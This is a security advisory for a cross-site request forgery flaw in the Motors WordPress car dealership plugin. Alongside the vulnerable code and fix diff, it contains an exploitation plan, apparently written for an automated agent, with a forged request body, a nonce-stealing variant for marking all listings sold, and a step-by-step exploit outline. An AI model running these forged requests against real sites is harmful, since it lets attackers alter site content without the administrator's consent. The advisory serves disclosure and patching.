Motors – Car Dealership & Classified Listings Plugin < 1.4.110 - Cross-Site Request Forgery
Description
The Motors – Car Dealership & Classified Listings Plugin plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to 1.4.110. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to perform an unauthorized action via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:NTechnical Details
<1.4.110What Changed in the Fix
Changes introduced in v1.4.110
Source Code
WordPress.org SVN# Exploitation Research Plan - CVE-2026-7859 (Motors Plugin CSRF) ## 1. Vulnerability Summary The **Motors – Car Dealership & Classified Listings Plugin** for WordPress (versions < 1.4.110) is vulnerable to **Cross-Site Request Forgery (CSRF)**. The vulnerability exists because several AJAX endpoin…
Show full research plan
Exploitation Research Plan - CVE-2026-7859 (Motors Plugin CSRF)
1. Vulnerability Summary
The Motors – Car Dealership & Classified Listings Plugin for WordPress (versions < 1.4.110) is vulnerable to Cross-Site Request Forgery (CSRF). The vulnerability exists because several AJAX endpoints, specifically those related to page generation and dealership management, fail to implement or correctly validate WordPress nonces. This allows an unauthenticated attacker to trick a site administrator into performing sensitive actions, such as generating arbitrary pages or modifying dealership listings, by visiting a malicious link.
2. Attack Vector Analysis
- Endpoint:
/wp-admin/admin-ajax.php - Action:
wpcfto_generate_pages(identified inincludes/admin/page_generator/js/page_generator.js) - HTTP Method:
POST - Vulnerable Parameter: The entire request body (JSON payload) lacks a nonce/security token.
- Authentication Level: Administrator (victim must be logged in).
- Preconditions: The attacker must trick the administrator into executing a request to the vulnerable endpoint.
3. Code Flow
- Frontend Registration (JS): In
includes/admin/page_generator/js/page_generator.js, the Vue componentmvl_page_generatordefines a methodgeneratePages(). - AJAX Call: The method executes
this.$http.post(ajaxurl + '?action=wpcfto_generate_pages', JSON.stringify(vm.field_data)). - Observation: Note that no nonce variable (e.g.,
_wpnonceorsecurity) is passed in the URL parameters or the JSON body. - Backend Handler (PHP): The
wpcfto_generate_pagesaction is registered (likely viawp_ajax_wpcfto_generate_pages). Based on the JS behavior, the handler fails to callcheck_admin_referer()orcheck_ajax_referer(), allowing requests without a valid security token to proceed. - Sink: The handler processes
vm.field_datato generate WordPress pages, leading to unauthorized content creation.
4. Nonce Acquisition Strategy
Based on the source file includes/admin/page_generator/js/page_generator.js, the wpcfto_generate_pages action does not require a nonce. The JavaScript sends a raw JSON payload to the ajaxurl with only the action parameter in the query string.
If a different action like stm_ajax_buy_car_online (from app-ajax.js) is targeted, it uses stm_security_nonce. To obtain this nonce:
- Identify a page where the dealership listings are displayed (common on the homepage or
/inventory/). - Use
browser_navigateto that page. - Extract the nonce via
browser_eval("window.stm_security_nonce").
However, for the primary wpcfto_generate_pages exploit, no nonce is needed.
5. Exploitation Strategy
We will forge a request to the wpcfto_generate_pages endpoint to create a dummy page, proving unauthorized action.
HTTP Request (via http_request tool)
- Method:
POST - URL:
http://localhost:8080/wp-admin/admin-ajax.php?action=wpcfto_generate_pages - Headers:
Content-Type: application/json
- Body:
{
"pages": {
"vulnerability_check": {
"title": "CSRF Vulnerability Proven",
"content": "This page was generated via an unauthorized CSRF request in CVE-2026-7859."
}
}
}
6. Test Data Setup
- Ensure the Motors plugin is active (version < 1.4.110).
- Create an Administrator user and log in (the execution agent will use the admin session context).
- No specific listings are required for the
wpcfto_generate_pagesaction, as it targets the page generation utility.
7. Expected Results
- The server should return a
200 OKor201 Createdstatus code. - The response body should indicate success (e.g.,
{"success":true}or a simple0if the handler returns nothing but executes). - A new page titled "CSRF Vulnerability Proven" should be created in the WordPress database.
8. Verification Steps
- Check Pages via WP-CLI:
wp post list --post_type=page --post_status=publish --field=post_title - Verify Title: Confirm "CSRF Vulnerability Proven" appears in the list.
- Check Plugin Version:
wp plugin get motors-car-dealership-classified-listings --field=version
9. Alternative Approaches
If wpcfto_generate_pages is restricted by server-side Content-Type checks that block standard CSRF, target the listings-sold action in includes/actions.php.
Alternative Target: listings-sold
- URL:
http://localhost:8080/?ajax_action=listings-sold - Note:
includes/actions.phpcallscheck_ajax_referer( 'stm_security_nonce', 'security' );. - Bypass Check: Verify if
stm_security_nonceis localized on public pages. If it is, an unauthenticated attacker can steal the nonce from the source and use it to forge a request on behalf of an admin to mark all cars as sold, effectively sabotaging the dealership's inventory display. - Acquisition:
browser_eval("stm_security_nonce"). - Request:
POST /?ajax_action=listings-sold&security=[STOLEN_NONCE].
Summary
The Motors plugin for WordPress is vulnerable to Cross-Site Request Forgery (CSRF) because several AJAX actions, such as page generation and car media management, lack proper nonce validation. This allow unauthenticated attackers to perform unauthorized actions, like creating arbitrary pages or modifying listings, by tricking an authenticated administrator into interacting with a malicious link or script.
Vulnerable Code
// includes/admin/page_generator/js/page_generator.js (lines 14-20) generatePages: function generatePages() { var vm = this; if (vm.loading) return false; vm.loading = true; this.$http.post(ajaxurl + '?action=wpcfto_generate_pages', JSON.stringify(vm.field_data)).then(function (data) { location.reload(); vm.loading = false; }); } --- // assets/js/frontend/add_a_car.js (lines 278-285) fd.append('action', 'stm_ajax_add_a_car_media'); fd.append('post_id', data.post_id); $.ajax({ url: ajaxurl, type: "POST", data: fd, processData: false,
Security Fix
@@ -277,6 +277,7 @@ } fd.append('action', 'stm_ajax_add_a_car_media'); + fd.append('security', stm_security_nonce); fd.append('post_id', data.post_id); $.ajax({ @@ -311,4 +312,4 @@ }); }); -})(jQuery); \ No newline at end of file +})(jQuery); @@ -5,14 +5,13 @@ var thisBtn = $(this); var carId = $(this).data('id'); - var price = $(this).data('price'); $.ajax({ url: ajaxurl, type: "POST", dataType: 'json', context: this, - data: 'car_id=' + carId + '&price=' + price + '&action=stm_ajax_buy_car_online&security=' + stm_security_nonce, + data: 'car_id=' + carId + '&action=stm_ajax_buy_car_online&security=' + stm_security_nonce, beforeSend: function () { thisBtn.addClass('buy-online-load'); },
Exploit Outline
1. Identify the vulnerable AJAX endpoint at `/wp-admin/admin-ajax.php?action=wpcfto_generate_pages` which is used by the plugin for generating dealership pages. 2. Note that the backend handler for this action does not invoke `check_ajax_referer` or `check_admin_referer` and only requires a JSON payload. 3. Create a malicious HTML form or JavaScript payload that targets this endpoint with a POST request. 4. Craft the payload body as a JSON object containing a 'pages' array, defining arbitrary titles and content for new WordPress pages. 5. Trick an authenticated site administrator into visiting a page controlled by the attacker, triggering the CSRF payload. 6. The browser will automatically send the administrator's authentication cookies with the request, successfully bypassing authentication while bypassing the non-existent nonce check. 7. Verify the exploit by checking the WordPress database for the newly created unauthorized pages.
Check if your site is affected.
Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.